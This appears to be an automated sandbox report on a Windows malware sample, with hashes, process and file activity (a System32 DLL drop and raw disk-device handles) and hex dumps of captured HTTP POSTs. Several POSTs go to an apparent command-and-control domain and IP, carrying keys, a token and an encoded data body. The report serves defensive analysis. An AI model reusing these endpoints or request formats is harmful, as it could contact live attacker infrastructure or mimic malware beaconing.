Analysis Date: 2018-06-11 14:06:07
MD5: f57c79e3948364274f304ab088226d1f
SHA1: 37a9ed5b369e2247d9990d6ba4d00034ccbcdc1f

Static Details:

File type: PE32 executable (GUI) Intel 80386, for MS Windows (32-bit)
PEhash: (not reported)

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe
  (a core system process; its listing here is not by itself evidence that the sample injected into it — confirm against the sandbox's process-tree/parent data before reporting it as a behaviour)

Process
↳ C:\Users\Phil\AppData\Local\Temp\37a9ed5b369e2247d9990d6ba4d00034ccbcdc1f.exe
  (the submitted sample, apparently renamed to its SHA-1 by the sandbox and run from the user's Temp directory)

Creates File: C:\Windows\System32\oleaccrc.dll
  (a DLL written under System32 — the name matches a legitimate Windows component, so verify the hash of the dropped file and whether it replaced an existing one; writing here implies the sample ran with elevated rights in the sandbox)
Creates File: \??\PhysicalDrive0
Creates File: \??\PhysicalDrive1
Creates File: \??\PhysicalDrive2
Creates File: \??\PhysicalDrive3
Creates File: \??\PhysicalDrive4
  ("Creates File" on \??\PhysicalDriveN means a raw disk-device handle was opened, not that a file was created; this gives access below the filesystem, e.g. to the boot sector — check the trace for read vs. write operations on these handles)

Network Details:
(summary of the captures below: three HTTP POSTs with the distinctive User-Agent "Medunja Solodunnja 6.0.0" — two to host api-supertrouper.info and one identical request directly to 5.149.248.134, which suggests an IP fallback for the same backend; treat the domain, the IP and the User-Agent string as candidate indicators. The /request/conditions POST carries a 1653-byte URL-encoded base64 "data=" body whose content is not decoded here. The SOAP request to 192.168.100.204:5357 with User-Agent WSDAPI is most likely Windows WS-Discovery/Devices background traffic from the guest OS, not sample-originated.)


Raw Pcap (four separate HTTP requests follow, hex on the left, ASCII on the right: 1) POST /request/autok to api-supertrouper.info; 2) WSDAPI SOAP POST to 192.168.100.204:5357; 3) POST /request/conditions with token and data body to api-supertrouper.info; 4) POST /request/autok to 5.149.248.134)
0x00000000 (00000)   504f5354 202f7265 71756573 742f6175   POST /request/au
0x00000010 (00016)   746f6b3f 75736572 3d6c7578 736f6674   tok?user=luxsoft
0x00000020 (00032)   26766572 3d313026 6b65793d 61386435   &ver=10&key=a8d5
0x00000030 (00048)   38386166 65313162 34663833 35393833   88afe11b4f835983
0x00000040 (00064)   30336162 64316231 61666333 20485454   03abd1b1afc3 HTT
0x00000050 (00080)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000060 (00096)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000070 (00112)   4d656475 6e6a6120 536f6c6f 64756e6e   Medunja Solodunn
0x00000080 (00128)   6a612036 2e302e30 0d0a436f 6e74656e   ja 6.0.0..Conten
0x00000090 (00144)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000a0 (00160)   696f6e2f 782d7777 772d666f 726d2d75   ion/x-www-form-u
0x000000b0 (00176)   726c656e 636f6465 640d0a48 6f73743a   rlencoded..Host:
0x000000c0 (00192)   20617069 2d737570 65727472 6f757065    api-supertroupe
0x000000d0 (00208)   722e696e 666f0d0a 436f6e74 656e742d   r.info..Content-
0x000000e0 (00224)   4c656e67 74683a20 300d0a43 61636865   Length: 0..Cache
0x000000f0 (00240)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000100 (00256)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e32 30343a35 3335370d 0a0d0a3c   00.204:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a633434 65333537 642d6139 63612d34   :c44e357d-a9ca-4
0x00000280 (00640)   3662632d 38306632 2d303363 35663764   6bc-80f2-03c5f7d
0x00000290 (00656)   34333736 663c2f77 73613a4d 65737361   4376f</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a3562 30656434   >urn:uuid:5b0ed4
0x00000340 (00832)   31642d66 6263362d 34626365 2d616430   1d-fbc6-4bce-ad0
0x00000350 (00848)   612d6561 37653066 61333933 61313c2f   a-ea7e0fa393a1</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>

0x00000000 (00000)   504f5354 202f7265 71756573 742f636f   POST /request/co
0x00000010 (00016)   6e646974 696f6e73 3f757365 723d6c75   nditions?user=lu
0x00000020 (00032)   78736f66 74267665 723d3130 266b6579   xsoft&ver=10&key
0x00000030 (00048)   3d616465 38633761 35343965 38396464   =ade8c7a549e89dd
0x00000040 (00064)   62636132 39316539 63386463 32333138   bca291e9c8dc2318
0x00000050 (00080)   3726746f 6b656e3d 30396135 39616264   7&token=09a59abd
0x00000060 (00096)   64373339 30303962 34306635 31313664   d739009b40f5116d
0x00000070 (00112)   37666131 66343433 20485454 502f312e   7fa1f443 HTTP/1.
0x00000080 (00128)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 4d656475   User-Agent: Medu
0x000000a0 (00160)   6e6a6120 536f6c6f 64756e6e 6a612036   nja Solodunnja 6
0x000000b0 (00176)   2e302e30 0d0a436f 6e74656e 742d5479   .0.0..Content-Ty
0x000000c0 (00192)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x000000d0 (00208)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x000000e0 (00224)   636f6465 640d0a48 6f73743a 20617069   coded..Host: api
0x000000f0 (00240)   2d737570 65727472 6f757065 722e696e   -supertrouper.in
0x00000100 (00256)   666f0d0a 436f6e74 656e742d 4c656e67   fo..Content-Leng
0x00000110 (00272)   74683a20 31363533 0d0a4361 6368652d   th: 1653..Cache-
0x00000120 (00288)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000130 (00304)   650d0a0d 0a646174 613d4d72 74476945   e....data=MrtGiE
0x00000140 (00320)   59673376 7650746c 644d5374 684e5948   Yg3vvPtldMSthNYH
0x00000150 (00336)   626a706a 52333137 5a415a43 46533571   bjpjR317ZAZCFS5q
0x00000160 (00352)   787a5064 66566978 4a35367a 4e6f3932   xzPdfVixJ56zNo92
0x00000170 (00368)   766d4647 72526a53 50366f44 7577486a   vmFGrRjSP6oDuwHj
0x00000180 (00384)   6f414b44 55435252 56697763 312f6b5a   oAKDUCRRViwc1/kZ
0x00000190 (00400)   42675074 6a74626c 47706543 31765a6e   BgPtjtblGpeC1vZn
0x000001a0 (00416)   5a51324c 475a4862 6a686837 70435443   ZQ2LGZHbjhh7pCTC
0x000001b0 (00432)   35727879 624a3938 556d4a4d 52584c55   5rxybJ98UmJMRXLU
0x000001c0 (00448)   64447846 67754438 644c3536 52384651   dDxFguD8dL56R8FQ
0x000001d0 (00464)   38523134 64677737 59394d46 567a5435   8R14dgw7Y9MFVzT5
0x000001e0 (00480)   39675848 79555154 25324238 712f586c   9gXHyUQT%2B8q/Xl
0x000001f0 (00496)   49754252 36253242 415a4861 5246516f   IuBR6%2BAZHaRFQo
0x00000200 (00512)   6d54736d 55753764 63755532 4941396d   mTsmUu7dcuU2IA9m
0x00000210 (00528)   3739496c 68596c4f 72386654 37694c73   79IlhYlOr8fT7iLs
0x00000220 (00544)   4d545149 6b662f64 6a444776 582f4d51   MTQIkf/djDGvX/MQ
0x00000230 (00560)   55516164 544e4571 572f7462 55556a64   UQadTNEqW/tbUUjd
0x00000240 (00576)   6f324f70 586a6436 595a334a 54757847   o2OpXjd6YZ3JTuxG
0x00000250 (00592)   5764414e 41457653 41305647 71583079   WdANAEvSA0VGqX0y
0x00000260 (00608)   436e6e6f 51504e69 51494f6b 72643438   CnnoQPNiQIOkrd48
0x00000270 (00624)   5a612532 42433158 7a66305a 6a346a30   Za%2BC1Xzf0Zj4j0
0x00000280 (00640)   48766d5a 31626859 586d6f56 69456758   HvmZ1bhYXmoViEgX
0x00000290 (00656)   74596138 396e6a6d 37715362 6271336a   tYa89njm7qSbbq3j
0x000002a0 (00672)   586e574f 5976456e 63645a6b 656b494d   XnWOYvEncdZkekIM
0x000002b0 (00688)   46625156 6f546d4c 43344679 6d74706c   FbQVoTmLC4Fymtpl
0x000002c0 (00704)   4c6e522f 652f394f 67784a53 74424a76   LnR/e/9OgxJStBJv
0x000002d0 (00720)   39546351 7a786254 6d52547a 645a6550   9TcQzxbTmRTzdZeP
0x000002e0 (00736)   35434165 77356e4f 64583059 366c6d51   5CAew5nOdX0Y6lmQ
0x000002f0 (00752)   755a4f43 41734f77 6f635867 31566535   uZOCAsOwocXg1Ve5
0x00000300 (00768)   6e446576 77717357 7364784c 6347646c   nDevwqsWsdxLcGdl
0x00000310 (00784)   536f4875 5231726a 344c4e59 4a4b374b   SoHuR1rj4LNYJK7K
0x00000320 (00800)   32497373 34757a54 75334470 2f547061   2Iss4uzTu3Dp/Tpa
0x00000330 (00816)   78785063 6e363941 66767463 42364d5a   xxPcn69AfvtcB6MZ
0x00000340 (00832)   4548775a 79465735 474d725a 4e596470   EHwZyFW5GMrZNYdp
0x00000350 (00848)   50667a65 584e3377 58335068 79483257   PfzeXN3wX3PhyH2W
0x00000360 (00864)   6f30434a 48507633 74657872 69666b63   o0CJHPv3texrifkc
0x00000370 (00880)   695a3765 70565678 79484956 74485a42   iZ7epVVxyHIVtHZB
0x00000380 (00896)   73627a31 79654443 36326a59 786d7474   sbz1yeDC62jYxmtt
0x00000390 (00912)   732f6953 43504374 31723647 50643579   s/iSCPCt1r6GPd5y
0x000003a0 (00928)   5a766355 59253242 78582f38 58444378   ZvcUY%2BxX/8XDCx
0x000003b0 (00944)   68746648 59487448 486a5939 6b414573   htfHYHtHHjY9kAEs
0x000003c0 (00960)   536a6f42 796c6a6e 4f6f6f59 7533566d   SjoByljnOooYu3Vm
0x000003d0 (00976)   55653031 47692f62 64575a52 37545561   Ue01Gi/bdWZR7TUa
0x000003e0 (00992)   4c39446d 2f795944 36576a78 3847612f   L9Dm/yYD6Wjx8Ga/
0x000003f0 (01008)   79746f39 73323156 47384a25 32422532   yto9s21VG8J%2B%2
0x00000400 (01024)   4257374e 65763859 4d783034 36557142   BW7Nev8YMx046UqB
0x00000410 (01040)   4d5a7043 706e4477 64747932 36387743   MZpCpnDwdty268wC
0x00000420 (01056)   43747254 614c4e52 78623879 74433455   CtrTaLNRxb8ytC4U
0x00000430 (01072)   5a75666b 4550334c 3365644f 75654770   ZufkEP3L3edOueGp
0x00000440 (01088)   6573505a 45495a73 554e4949 50357459   esPZEIZsUNIIP5tY
0x00000450 (01104)   47537135 6348774a 4d695a75 474d362f   GSq5cHwJMiZuGM6/
0x00000460 (01120)   62763732 646f7925 32426d37 75686966   bv72doy%2Bm7uhif
0x00000470 (01136)   2f59686b 6c776379 62696a59 584d7855   /YhklwcybijYXMxU
0x00000480 (01152)   30626831 33583059 5252796e 304b3666   0bh13X0YRRyn0K6f
0x00000490 (01168)   61505851 6152384a 25324230 645a7667   aPXQaR8J%2B0dZvg
0x000004a0 (01184)   554c4755 33366634 704b4e4b 434f6779   ULGU36f4pKNKCOgy
0x000004b0 (01200)   67716756 6e476f67 676e7a41 7a454167   gqgVnGoggnzAzEAg
0x000004c0 (01216)   6b487042 394b6a4a 55767861 4344396f   kHpB9KjJUvxaCD9o
0x000004d0 (01232)   32383376 4d444b36 474c7472 55415471   283vMDK6GLtrUATq
0x000004e0 (01248)   52784537 73667652 522f394d 6b7a7030   RxE7sfvRR/9Mkzp0
0x000004f0 (01264)   75395256 45554f56 71763647 4b525248   u9RVEUOVqv6GKRRH
0x00000500 (01280)   4f6b4247 71444e35 3135527a 4c474c59   OkBGqDN515RzLGLY
0x00000510 (01296)   30743568 616c4331 575a7942 58357246   0t5halC1WZyBX5rF
0x00000520 (01312)   4c253242 6f737974 33564e39 30337a63   L%2Bosyt3VN903zc
0x00000530 (01328)   427a306a 4953394c 6e647937 7a496771   Bz0jIS9Lndy7zIgq
0x00000540 (01344)   4f6d6c5a 38734547 74376657 69503345   OmlZ8sEGt7fWiP3E
0x00000550 (01360)   71525868 38314833 434e5133 79384742   qRXh81H3CNQ3y8GB
0x00000560 (01376)   4e486151 436b2532 42654553 53397338   NHaQCk%2BeESS9s8
0x00000570 (01392)   7233356b 5431344c 5139707a 35332f25   r35kT14LQ9pz53/%
0x00000580 (01408)   32425652 734b5869 527a3449 72594971   2BVRsKXiRz4IrYIq
0x00000590 (01424)   6536516d 30556261 464e705a 6147786d   e6Qm0UbaFNpZaGxm
0x000005a0 (01440)   772f3655 655a6844 4e48384d 4343332f   w/6UeZhDNH8MCC3/
0x000005b0 (01456)   69582532 424d4f6e 33596978 384d3955   iX%2BMOn3Yix8M9U
0x000005c0 (01472)   6e31585a 724c304e 6d625464 2f52735a   n1XZrL0NmbTd/RsZ
0x000005d0 (01488)   72703773 64766361 2f783975 74786a75   rp7sdvca/x9utxju
0x000005e0 (01504)   33316950 52685a4e 4a577365 34626c46   31iPRhZNJWse4blF
0x000005f0 (01520)   70706e52 63524644 35745037 56726549   ppnRcRFD5tP7VreI
0x00000600 (01536)   5579322f 4c6e7674 30746d32 65767a2f   Uy2/Lnvt0tm2evz/
0x00000610 (01552)   6d4f4a4f 67535573 65424a5a 2f766757   mOJOgSUseBJZ/vgW
0x00000620 (01568)   66482532 427a6842 4347387a 5643687a   fH%2BzhBCG8zVChz
0x00000630 (01584)   67473558 33466c6b 46346f74 454f365a   gG5X3FlkF4otEO6Z
0x00000640 (01600)   6e4c6773 774c6155 4c723932 584d7861   nLgswLaULr92XMxa
0x00000650 (01616)   655a3362 426b6e56 53316259 316b5356   eZ3bBknVS1bY1kSV
0x00000660 (01632)   7a784462 5556427a 77634339 6558576a   zxDbUVBzwcC9eXWj
0x00000670 (01648)   3246654d 504a386f 68754431 4c783754   2FeMPJ8ohuD1Lx7T
0x00000680 (01664)   344d7159 707a4533 2532422f 62773141   4MqYpzE3%2B/bw1A
0x00000690 (01680)   4d445a76 734c6e77 4e336d4d 53377379   MDZvsLnwN3mMS7sy
0x000006a0 (01696)   5731305a 36683063 4b6a3631 344f7546   W10Z6h0cKj614OuF
0x000006b0 (01712)   4c4e7672 7838394f 6d525772 42477744   LNvrx89OmRWrBGwD
0x000006c0 (01728)   56536b47 4a642532 426c6f64 57396b53   VSkGJd%2BlodW9kS
0x000006d0 (01744)   25324261 314f5774 376a7a57 356c4349   %2Ba1OWt7jzW5lCI
0x000006e0 (01760)   464e504a 42727678 394e6831 415a3041   FNPJBrvx9Nh1AZ0A
0x000006f0 (01776)   67253242 4d6a4155 41456151 57595075   g%2BMjAUAEaQWYPu
0x00000700 (01792)   7a2f7176 6f656751 322f356f 6e56694f   z/qvoegQ2/5onViO
0x00000710 (01808)   316d7434 68544c62 38756525 32425348   1mt4hTLb8ue%2BSH
0x00000720 (01824)   4d526438 7079614e 77317454 71713454   MRd8pyaNw1tTqq4T
0x00000730 (01840)   6c4b7a72 6877375a 664b6e76 48694166   lKzrhw7ZfKnvHiAf
0x00000740 (01856)   6248676d 69453241 4d457668 44377641   bHgmiE2AMEvhD7vA
0x00000750 (01872)   63556937 46756a4c 4e576568 48564d4e   cUi7FujLNWehHVMN
0x00000760 (01888)   54617135 67787579 4a66494d 526d4b6c   Taq5gxuyJfIMRmKl
0x00000770 (01904)   35567673 6562712f 37577965 52775637   5Vvsebq/7WyeRwV7
0x00000780 (01920)   65344849 7a53454f 626c526e 5648614f   e4HIzSEOblRnVHaO
0x00000790 (01936)   66335466 636b386e 58377959 7a6a6c62   f3Tfck8nX7yYzjlb
0x000007a0 (01952)   78335159 6c6b5644 303d                x3QYlkVD0=

0x00000000 (00000)   504f5354 202f7265 71756573 742f6175   POST /request/au
0x00000010 (00016)   746f6b3f 75736572 3d6c7578 736f6674   tok?user=luxsoft
0x00000020 (00032)   26766572 3d313026 6b65793d 61386435   &ver=10&key=a8d5
0x00000030 (00048)   38386166 65313162 34663833 35393833   88afe11b4f835983
0x00000040 (00064)   30336162 64316231 61666333 20485454   03abd1b1afc3 HTT
0x00000050 (00080)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000060 (00096)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x00000070 (00112)   4d656475 6e6a6120 536f6c6f 64756e6e   Medunja Solodunn
0x00000080 (00128)   6a612036 2e302e30 0d0a436f 6e74656e   ja 6.0.0..Conten
0x00000090 (00144)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000a0 (00160)   696f6e2f 782d7777 772d666f 726d2d75   ion/x-www-form-u
0x000000b0 (00176)   726c656e 636f6465 640d0a48 6f73743a   rlencoded..Host:
0x000000c0 (00192)   20352e31 34392e32 34382e31 33340d0a    5.149.248.134..
0x000000d0 (00208)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000e0 (00224)   300d0a43 61636865 2d436f6e 74726f6c   0..Cache-Control
0x000000f0 (00240)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....


Strings